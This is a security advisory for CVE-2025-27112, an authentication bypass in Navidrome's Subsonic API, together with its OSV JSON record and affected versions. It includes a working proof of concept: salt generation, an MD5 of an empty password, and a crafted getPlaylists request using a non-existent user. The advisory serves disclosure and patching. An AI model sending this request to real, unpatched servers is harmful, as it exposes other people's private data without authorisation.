ghsa-c3p4-vm8f-386p
Vulnerability from github
Summary
In certain Subsonic API endpoints, authentication can be bypassed by using a non-existent username combined with an empty (salted) password hash. This allows read-only access to the server’s resources, though attempts at write operations fail with a “permission denied” error.
Details
A flaw in the authentication check process allows an attacker to specify any arbitrary username that does not exist on the system, along with a salted hash of an empty password. Under these conditions, Navidrome treats the request as authenticated, granting access to various Subsonic endpoints without requiring valid credentials.
Proof of Concept (PoC)
- Generate a random salt:
javascript
// e.g., salt = "x1vbudn1m6d"
Math.random().toString(36).substring(2, 15)
- Calculate the MD5 hash of an empty password plus the salt:
shell
# Using the example salt above
echo -n "x1vbudn1m6d" | md5sum
81f0c0fb5d202ab0d012e6eaeb722d79 -
- Send a request specifying a fake user, with the hash and salt values:
GET https://[host]/rest/getPlaylists?u=FakeUser&t=81f0c0fb5d202ab0d012e6eaeb722d79&s=x1vbudn1m6d&v=1.16.1&c=castafiore&f=json
Impact
An attacker can use any non-existent username to bypass the authentication system and gain access to various read-only data in Navidrome, such as user playlists. However, any attempt to modify data fails due to insufficient permissions, limiting the impact to unauthorized viewing of information.
{ "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/navidrome/navidrome" }, "ranges": [ { "events": [ { "introduced": "0.52.0" }, { "fixed": "0.54.5" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2025-27112" ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2025-02-25T17:49:07Z", "nvd_published_at": "2025-02-24T19:15:14Z", "severity": "MODERATE" }, "details": "### Summary\n\nIn certain Subsonic API endpoints, authentication can be bypassed by using a non-existent username combined with an empty (salted) password hash. This allows read-only access to the server\u2019s resources, though attempts at write operations fail with a \u201cpermission denied\u201d error.\n\n### Details\n\nA flaw in the authentication check process allows an attacker to specify any arbitrary username that does not exist on the system, along with a salted hash of an empty password. Under these conditions, Navidrome treats the request as authenticated, granting access to various Subsonic endpoints without requiring valid credentials.\n\n### Proof of Concept (PoC)\n\n1. Generate a random salt:\n\n ```javascript\n // e.g., salt = \"x1vbudn1m6d\"\n Math.random().toString(36).substring(2, 15)\n ```\n\n2. Calculate the MD5 hash of an empty password plus the salt:\n\n ```shell\n # Using the example salt above\n echo -n \"x1vbudn1m6d\" | md5sum\n 81f0c0fb5d202ab0d012e6eaeb722d79 -\n ```\n\n3. Send a request specifying a fake user, with the hash and salt values:\n\n ```\n GET https://[host]/rest/getPlaylists?u=FakeUser\u0026t=81f0c0fb5d202ab0d012e6eaeb722d79\u0026s=x1vbudn1m6d\u0026v=1.16.1\u0026c=castafiore\u0026f=json\n ```\n\n### Impact\n\nAn attacker can use any non-existent username to bypass the authentication system and gain access to various read-only data in Navidrome, such as user playlists. However, any attempt to modify data fails due to insufficient permissions, limiting the impact to unauthorized viewing of information.", "id": "GHSA-c3p4-vm8f-386p", "modified": "2025-02-25T17:49:07Z", "published": "2025-02-25T17:49:07Z", "references": [ { "type": "WEB", "url": "https://github.com/navidrome/navidrome/security/advisories/GHSA-c3p4-vm8f-386p" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27112" }, { "type": "WEB", "url": "https://github.com/navidrome/navidrome/commit/09ae41a2da66264c60ef307882362d2e2d8d8b89" }, { "type": "WEB", "url": "https://github.com/navidrome/navidrome/commit/287079a9e409fb6b9708ca384d7daa7b5185c1a0" }, { "type": "PACKAGE", "url": "https://github.com/navidrome/navidrome" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N", "type": "CVSS_V4" } ], "summary": "Navidrome allows an authentication bypass in Subsonic API with non-existent username" }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.